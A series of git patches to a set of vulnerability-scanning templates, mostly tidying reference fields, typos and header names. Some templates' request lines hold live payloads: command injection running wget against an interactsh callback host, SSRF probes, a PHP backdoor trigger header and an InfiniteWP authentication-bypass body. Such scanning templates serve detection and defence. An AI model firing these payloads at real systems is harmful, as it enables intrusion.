cve,cve2020,sqli,opensis - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://cinzinga.com/CVE-2020-6637/ diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 79604d3e12..9f70517315 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-20090 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 8829a72d18..55bd86f160 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 2074155e32..306d94127d 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml index 90776f8a1c..408f23de62 100644 --- a/cves/2021/CVE-2021-24320.yaml +++ b/cves/2021/CVE-2021-24320.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: medium description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. - reference: | + reference: - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb tags: cve,cve2021,wordpress,xss,wp-plugin diff --git a/cves/2021/CVE-2021-29484.yaml b/cves/2021/CVE-2021-29484.yaml index 1182c01f6c..1284ca92c8 100644 --- a/cves/2021/CVE-2021-29484.yaml +++ b/cves/2021/CVE-2021-29484.yaml @@ -6,7 +6,7 @@ info: description: Ghost is a Node.js CMS. An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site. severity: medium tags: cve,cve2021,xss,ghost - reference: | + reference: - https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0b5d2358bc..0168388bab 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. - reference: | + reference: - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure,router diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index 0326dec716..70f2fb7787 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -5,7 +5,7 @@ info: description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter. author: gy741 severity: critical - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index a53d190db8..7ffb782090 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData. - reference: | + reference: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 22b856d488..b3ef250c02 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. - reference: | + reference: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 diff --git a/cves/2021/CVE-2021-35336.yaml b/cves/2021/CVE-2021-35336.yaml index 3d974df91c..3c5b70ca06 100644 --- a/cves/2021/CVE-2021-35336.yaml +++ b/cves/2021/CVE-2021-35336.yaml @@ -5,7 +5,7 @@ info: author: Pratik Khalane severity: critical description: Finding the Tieline Admin Panels with default credentials. - reference: | + reference: - https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c - https://nvd.nist.gov/vuln/detail/CVE-2021-35336 tags: cve,cve2021,tieline,default-login diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index f267fd3f68..7030f465af 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -5,7 +5,7 @@ info: description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session. author: gy741 severity: critical - reference: | + reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index 124362cab5..f9424b16b2 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -6,7 +6,7 @@ info: severity: low description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache - reference: | + reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 diff --git a/exposures/configs/qdpm-info-leak.yaml b/exposures/configs/qdpm-info-leak.yaml index 2d3ffedf3c..6489c2c300 100644 --- a/exposures/configs/qdpm-info-leak.yaml +++ b/exposures/configs/qdpm-info-leak.yaml @@ -6,7 +6,7 @@ info: name: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) severity: high tags: qdpm,exposure - reference: | + reference: - https://www.exploit-db.com/exploits/50176 requests: diff --git a/misconfiguration/akamai-arl-xss.yaml b/misconfiguration/akamai-arl-xss.yaml index 1acd46aec1..7fb7ddc1a7 100644 --- a/misconfiguration/akamai-arl-xss.yaml +++ b/misconfiguration/akamai-arl-xss.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: medium tags: akamai,xss - reference: | + reference: - https://github.com/war-and-code/akamai-arl-hack - https://twitter.com/SpiderSec/status/1421176297548435459 - https://warandcode.com/post/akamai-arl-hack/ diff --git a/misconfiguration/zabbix-dashboards-access.yaml b/misconfiguration/zabbix-dashboards-access.yaml index c3c1386d66..b1e5ae80f7 100644 --- a/misconfiguration/zabbix-dashboards-access.yaml +++ b/misconfiguration/zabbix-dashboards-access.yaml @@ -5,7 +5,7 @@ info: author: pussycat0x,vsh00t severity: medium description: View dashboard with guest login. - reference: | + reference: - https://www.exploit-db.com/ghdb/5595 - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt tags: zabbix,unauth diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml index dcf76b07c1..340dd72666 100644 --- a/takeovers/announcekit-takeover.yaml +++ b/takeovers/announcekit-takeover.yaml @@ -5,7 +5,7 @@ info: author: melbadry9 severity: high tags: takeover,announcekit - reference: | + reference: - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 diff --git a/vulnerabilities/other/beward-ipcamera-disclosure.yaml b/vulnerabilities/other/beward-ipcamera-disclosure.yaml index caeb3dd6c3..1dd105d3fd 100644 --- a/vulnerabilities/other/beward-ipcamera-disclosure.yaml +++ b/vulnerabilities/other/beward-ipcamera-disclosure.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API. - reference: | + reference: - https://www.exploit-db.com/exploits/46320 - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php tags: iot,camera,disclosure diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml index 8dec57680f..5c7a5ce8c2 100644 --- a/vulnerabilities/other/buffalo-config-injection.yaml +++ b/vulnerabilities/other/buffalo-config-injection.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. - reference: | + reference: - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild - https://www.tenable.com/security/research/tra-2021-13 - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml index 654cd03d19..a138c0ceb1 100644 --- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml +++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml @@ -4,7 +4,7 @@ info: name: MS Exchange Server XSS author: infosecsanyam severity: medium - reference: | + reference: - https://www.shodan.io/search?query=http.title%3A%22Outlook%22 - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html tags: miscrsoft,exchange,owa,xss diff --git a/vulnerabilities/other/opensis-lfi.yaml b/vulnerabilities/other/opensis-lfi.yaml index 5412177045..c6e5e91adf 100644 --- a/vulnerabilities/other/opensis-lfi.yaml +++ b/vulnerabilities/other/opensis-lfi.yaml @@ -4,7 +4,7 @@ info: name: openSIS 5.1 - 'ajax.php' Local File Inclusion author: pikpikcu severity: high - reference: | + reference: - https://www.exploit-db.com/exploits/38039 - https://www.securityfocus.com/bid/56598/info tags: opensis,lfi diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 39a55cbf7f..06555a6586 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: | + reference: - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml index 6ca5d17599..82c7b74499 100644 --- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml +++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml @@ -5,7 +5,7 @@ info: author: mohammedsaneem,sec_hawk severity: medium description: Allows attacker to view sensitive information such as company invoices - reference: | + reference: - https://twitter.com/sec_hawk/status/1426984595094913025?s=21 - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml - https://woocommerce.com/products/pdf-invoices/ From 97d4f8705b5fd6a292793a2deb6f620b9830aed3 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 16:59:55 +0300 Subject: [PATCH 1746/4083] Fixed mistakes/typos Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2019/CVE-2019-0193.yaml | 2 +- cves/2019/CVE-2019-8451.yaml | 2 +- cves/2020/CVE-2020-28188.yaml | 4 ++-- cves/2020/CVE-2020-7796.yaml | 4 ++-- cves/2021/CVE-2021-3297.yaml | 4 ++-- network/cisco-smi-exposure.yaml | 2 +- technologies/mautic-crm-detect.yaml | 2 +- technologies/sap-web-dispatcher-admin-portal.yaml | 6 +++--- vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 2 +- vulnerabilities/other/sick-beard-xss.yaml | 2 +- vulnerabilities/other/zimbra-preauth-ssrf.yaml | 4 ++-- .../wordpress/wordpress-infinitewp-auth-bypass.yaml | 1 - 12 files changed, 17 insertions(+), 18 deletions(-) diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 77a2a57b9d..d367f5e9a6 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -5,7 +5,7 @@ info: description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam severity: critical - refrense: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml index abdacb5528..c13e0e6df5 100644 --- a/cves/2019/CVE-2019-8451.yaml +++ b/cves/2019/CVE-2019-8451.yaml @@ -20,7 +20,7 @@ requests: url=https://{{Hostname}}:443@{{interactsh-url}} headers: - X-Atlassian-token: no-check + X-Atlassian-Token: no-check Content-Type: application/x-www-form-urlencoded matchers: diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index 2bf5ae0888..a4d926f2a5 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -16,14 +16,14 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 6f02ee6688..70fc14a6ca 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml @@ -5,7 +5,7 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled. - reference: | + reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob @@ -14,7 +14,7 @@ requests: - | GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index dd73110c6d..383ea4d3fe 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -4,7 +4,7 @@ info: description: On Zyxel NBG2105 V1.00(AAGU.2)C0 devices, setting the login cookie to 1 provides administrator access. author: gy741 severity: high - reference: | + reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router @@ -18,7 +18,7 @@ requests: Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive - cookie: language=en; login=1 + Cookie: language=en; login=1 matchers-condition: and matchers: diff --git a/network/cisco-smi-exposure.yaml b/network/cisco-smi-exposure.yaml index 438ecd7920..212bbf0f1b 100644 --- a/network/cisco-smi-exposure.yaml +++ b/network/cisco-smi-exposure.yaml @@ -9,7 +9,7 @@ info: connecting to the specified Cisco Smart Install port and determines if it speaks the Smart Install Protocol. Exposure of SMI to untrusted networks can allow complete compromise of the switch. - references: | + reference: - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi diff --git a/technologies/mautic-crm-detect.yaml b/technologies/mautic-crm-detect.yaml index 42d0c4df6f..9d2f535e1d 100644 --- a/technologies/mautic-crm-detect.yaml +++ b/technologies/mautic-crm-detect.yaml @@ -14,7 +14,7 @@ requests: path: - "{{BaseURL}}/s/login" - matcherscondition: or + matchers-condition: or matchers: - type: word part: body diff --git a/technologies/sap-web-dispatcher-admin-portal.yaml b/technologies/sap-web-dispatcher-admin-portal.yaml index c403098fb1..f6f7c62464 100644 --- a/technologies/sap-web-dispatcher-admin-portal.yaml +++ b/technologies/sap-web-dispatcher-admin-portal.yaml @@ -19,20 +19,20 @@ requests: matchers: - type: word part: header - conditions: or + condition: or words: - "Basic realm=\"WEB ADMIN\"" - "SAP NetWeaver Application Server" - type: status - conditions: or + condition: or status: - 401 - 200 - type: word part: body - conditions: or + condition: or words: - "SAP Web Dispatcher" - "Administration" \ No newline at end of file diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 469a6fa8b1..9c2df26245 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}" headers: - User-Agentt: zerodiumvar_dump(233*233); + User-Agent: zerodiumvar_dump(233*233); matchers-condition: and matchers: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index a384753cdb..51b5a3253c 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -8,7 +8,7 @@ info: reference: - https://sickbeard.com/ # vendor homepage - https://github.com/midgetspy/Sick-Beard # software link - customAttributes: + additional-fields: shodan-dork: sickbeard requests: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index 4b700e84a1..a67e1f1177 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -4,7 +4,7 @@ info: name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical - reference: | + reference: - https://www.adminxe.com/2183.html tags: zimbra,ssrf,oob @@ -13,7 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index c51387653c..1f8a3bb2db 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -29,7 +29,6 @@ requests: Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} From 002e8db616118453e9a317fc556f3602e6b6dbde Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 17:00:46 +0300 Subject: [PATCH 1747/4083] Moved the "vendor" custom attribute under reference Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- exposures/configs/ruijie-eg-password-leak.yaml | 5 +++-- exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml | 5 +++-- vulnerabilities/other/ruijie-eg-rce.yaml | 5 +++-- 3 files changed, 9 insertions(+), 6 deletions(-) diff --git a/exposures/configs/ruijie-eg-password-leak.yaml b/exposures/configs/ruijie-eg-password-leak.yaml index a02f3e155b..884592d400 100644 --- a/exposures/configs/ruijie-eg-password-leak.yaml +++ b/exposures/configs/ruijie-eg-password-leak.yaml @@ -5,8 +5,9 @@ info: author: pikpikcu,pdteam severity: high description: Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability - reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html - vendor: https://www.ruijienetworks.com + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html + - https://www.ruijienetworks.com tags: ruijie,exposure requests: diff --git a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml index 0b73555669..2af510fdfd 100644 --- a/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml +++ b/exposures/configs/ruijie-nbr1300g-cli-password-leak.yaml @@ -4,8 +4,9 @@ info: name: Ruijie NBR1300G Cli Password Leak author: pikpikcu severity: medium - reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - vendor: https://www.ruijienetworks.com + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://www.ruijienetworks.com tags: ruijie,exposure requests: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index e0b9163fc0..d2fd73f7de 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -4,8 +4,9 @@ info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical - reference: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html - vendor: https://www.ruijienetworks.com + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html + - https://www.ruijienetworks.com tags: ruijie,rce requests: From 2a320412bf333126653a8c997eb72dfa2c87df67 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 17:25:01 +0300 Subject: [PATCH 1748/4083] Misc (minor) Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- CONTRIBUTING.md | 2 +- cves/2017/CVE-2017-7391.yaml | 5 +++-- cves/2020/CVE-2020-11991.yaml | 2 +- cves/2020/CVE-2020-25223.yaml | 2 +- cves/2020/CVE-2020-5776.yaml | 4 ++-- cves/2020/CVE-2020-5777.yaml | 2 +- default-logins/grafana/grafana-default-credential.yaml | 3 +-- technologies/magento-detect.yaml | 5 +++-- 8 files changed, 13 insertions(+), 12 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 61084b76db..64b9408cf0 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -53,7 +53,7 @@ git checkout -b template_branch_name git add . ``` -- To commit give a descriptive message for the convenience of reveiwer by: +- To commit, give a descriptive message for the convenience of the reviewer by: ```sh # This message get associated with all files you have 